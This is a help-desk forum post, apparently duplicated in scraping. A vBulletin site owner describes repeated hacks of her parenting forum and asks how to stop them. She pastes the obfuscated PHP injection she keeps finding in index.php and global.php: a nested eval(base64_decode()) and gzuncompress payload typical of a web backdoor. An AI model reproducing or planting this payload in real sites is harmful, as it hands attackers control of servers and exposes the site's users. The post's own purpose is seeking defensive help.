Tweet
Hi VB support,
My full updated 4.2.2 forum of 8 years has recently been getting hacked over and over within the past few months, despite my endless attempts to secure it. I've changed passwords - database, forum and FTP. I've checked for unauthorised admin accounts. I've followed various tutorials and guides on protecting against hackers, including the default advice from my webhost, and the ones posted here. I've removed all hacks. I always ensure the install folder is deleted. I've even gone to the extent of deleting ALL files off the server and uploading fresh ones and just running off those alone. I only have the one custom template installed.
This has only recently become a problem. For 7 years our site was not hacked once, and nothing new has been added recently. But now its happening frequently.
This is the code I keep finding injected into index.php, and global.php, which makes my forum go blank:
Please help. My webhost has given up on helping me with this. I'm at wits end. What more can I do?
This is my website: http://www.theparentsanctuary.net/forums/index.php
Thanks so much in advance for any advice.
Nikki.
My full updated 4.2.2 forum of 8 years has recently been getting hacked over and over within the past few months, despite my endless attempts to secure it. I've changed passwords - database, forum and FTP. I've checked for unauthorised admin accounts. I've followed various tutorials and guides on protecting against hackers, including the default advice from my webhost, and the ones posted here. I've removed all hacks. I always ensure the install folder is deleted. I've even gone to the extent of deleting ALL files off the server and uploading fresh ones and just running off those alone. I only have the one custom template installed.
This has only recently become a problem. For 7 years our site was not hacked once, and nothing new has been added recently. But now its happening frequently.
This is the code I keep finding injected into index.php, and global.php, which makes my forum go blank:
Code:
eval(base64_decode("DQpldmFsKGJhc2U2NF9kZWNvZGUoIlpYWmhiQ2huZW5WdVkyOXRjSEpsYzNNb1ltRnpaVFkwWDJSbFkyOWtaU2duWlU1eFpGVXhSbkpuZWtGUkwybDBOMGRMVkVOSFRHRjFaM3BDT0dOQk9WUndTRTlSWjFkaFQwbHFSelpFZEVWT01tODJhSFl6TmpscE4xZHNiV3h1TmpocFZua3pNekV6T1RFeU9HUm9ZM1pxT0RkcE9Wb3dheko2YjJoVE9YUmFjakJWT1ZOalZXMTJOemxNYzJ4NEsxb3ZiVVY0U25oak0xSkxMMEpyZDNRdk1FNVhORmM0UzBnMVduWnBiV29yVWxsNVltczBlVTByZUVSbWVFbENkVmRMVVhwV2RscGFZMVpWY1ZKcmFrd3pRek5vTVcxVVpYTTVNVzVEY1ZoNk1tVndhRXA0U21kRGEwRmlkMFJwWVcwdk1VMXFSbE56Tkd4aFFVSlVTMEZLZW5CRVNtVTBNMGx4U1M4dlUzaHdVVnBxVm1kblkyMHhiRzVhT1hKRE1uUkNaMk5wYW01SlQycEVaME5CUWpCVVVGTlZORmhSTkhOa1MwVXlOMEoxTTJKSE1GQmxOREZrTHpKd2VXNXliV3RTTlU5MGMweERWMnN4TUdGSWVqSm1OazkwZVN0bVRuRjBWbEpsTVVKaE5rNHpRa1ZaTUdWYWJtbzBjWE4wTkZOeVpIWnVRbGRaTmxkbk56aEdiMjA1YjNFeGFXZ3pOM3BITmpZNU0zSm9hRTh3VjFJNWR5dGxXU3MwTnpaUVMwazNjV1JqTkU1TlFWZ3Jaa2Q1Y1cxWlZIbzRRV1ZEUzB0T01EMG5LU2twT3lBL1Bqdy9JR1YyWVd3b1ozcDFibU52YlhCeVpYTnpLR0poYzJVMk5GOWtaV052WkdVb0oyVk9jRTVWYkRGMmJUQkJVUzlEZEN0elNWRjBWbE13SzJwQ1ZWVTRaVUpoUVZSbGFGWlhTVzVJUm5oV1ZsSjZVVUpJVW1jeE0zbHVObTQ0VUU4d04xTjJkWHAxTjJRM2RYcE5OMlJ5Tm1GTk5pdDRVVlIxY0doT2N6TnRaalpoVW5aVU5tUnZiVWR0Y0dSM05WTklXbWhoZUNzd2MwWkRUalpNVkVwU09ESnRXVEYzTkdSV2FqQkxjV0pOU1RGTFExVlhlVlk0ZERoME5sWkxiM2xFUTNoT09HNXVhM1Z0YjJveVdIbEpXbTVuWXpSMFFqVlNNalpEYmxOVldrTlRMMjlzVTBORldEUlhPR3cxU0hnMU1UbEthMWQ0V0hsYU9ESmpWR3hCTkdkYWRUUllhekUxVlVsVlQyOXJWekZNVVdoTmVYRjZNblp2U0hKd05tc3JZVFp4Y1VaRVIzWm5SRFJFWW5aS1IyMVpXalpuYm1sa2N6ZHNWSEpaWVRoVWVIZGtWWHB6VG5SWk16RklkMHhFWnpWYWQwRTVPV3RSVnpreU4wcEVTUzlPVkZnMWVFUkVZV2xSYTBab2JIVldNVmROVG1wVFUzUmFaM0JNZDNsYU5taGlhbUpuTDNaME1tZERRM2hTT1dKM1FuZHRhemQwVFRkQ2NGTXZZV3R0TjFGRU0waFZUak5DU1cxS1VIcHVlR0pUUWxKUFRHbHFSSEl4ZG5OcE1qUkJVVFJqTTJ4aWFGWmxZMWN6Vm5JM1MzcEtkemhqYUM4clpqZGhTVkUyWjBZMFNYVlBNSFpsZFd4WlprSTNkbWx4SzA5eFRFTjRTREJhUlhSMWRsbEtiM2N2YlZCNFJuaFdkMDQwTmxJdlFYaHVTMDFqV1hsbmQzaHFTSFlyZDJjNFZsRnJTV2xMZFhGelpUaFpRbFUwY0VKelEzSnRRekV3TVVSa2JVWjFTRVpFS3pGWVkyNXpWRVZyWW1KMFlUTk9UREE1Y0ROYWVrdHBXWGx4WkV4WU9HMWhWSGhKVld4dU1DdHFOMDVRYzNoMkwzbzNRWE55VFhoUVNUMG5LU2twT3lBL1Bqdy9JR1YyWVd3b1ozcDFibU52YlhCeVpYTnpLR0poYzJVMk5GOWtaV052WkdVb0oyVk9jRGxyT1hSeFp6QkJVVkZJSzJ4Q1ZXdGpZVzlQZW5KcVkydEVlVzVaT1VOSE1IaGthU3RwVUZkc2JHZHhiR2RYUW5CS1ptcDJNVlJWTWxVell6Tm5jR1JvZW04MGVuZzVWbGxpZURWMVZuQjBkRTVwTDNGd2NHcHViVm95WWlzNU0xZzFOblJ3UVRCVVZtMTZiRWRXT0hwdVNISjVUVlZaYW5WM2FHMVFZM2hJUVdKSVdtaFVUaXREZFZkck1GcFhSbUp3ZVhSaFVuSkhUbXNyWXpSQldrSTBNWFpJU0hKSVZqWTJSbVJDU2tWdmMzQlRWazlpYTB3d0wxWTFPV3hJT0dwUFJqUTBVR1ZHTmxSSVNWQkdPSGhXTTJoUlRqaFhSVUZPZFc1SGEzSnZWVVZwT1VacU0wRlJla2hLVFZwWVpIQXJiR2RyT0ZjeVkzaEZhM1UxYlVOVU5VWk5XRVpMZERGbVNpOXRabEl5Y0VSWVpHOUJOakkyTmxRdldXSnBLM0k1WjJsRFlYTlJia05HVFdwQlZVVmpUbEpKVTJoTGMxSjBRVzVxWVdobmEycExaR2hIUjBZNFJHVk5VVXAwUVhkdVJFTm9hSEZIVDFWVFRWb3ZNVzVYWVUxaVQyTTFPVzFqVG5rMlUybG5XVWxQWTNOU1JqSnFVbXBoYW5Oc1JtcHRNVWhpTWs5dFIyYzVhWFpGYTJWT2J6RkRkV2RMYUhsRVVIQnBUWE5QU0N0VWNtSlZabXhVTVdReFVESnlZblJNZUZWcVUyVXdQU2NwS1NrNyIpKTsNCg=="));
This is my website: http://www.theparentsanctuary.net/forums/index.php
Thanks so much in advance for any advice.
Nikki.
There's gotta be a way to stop this, surely??
Comment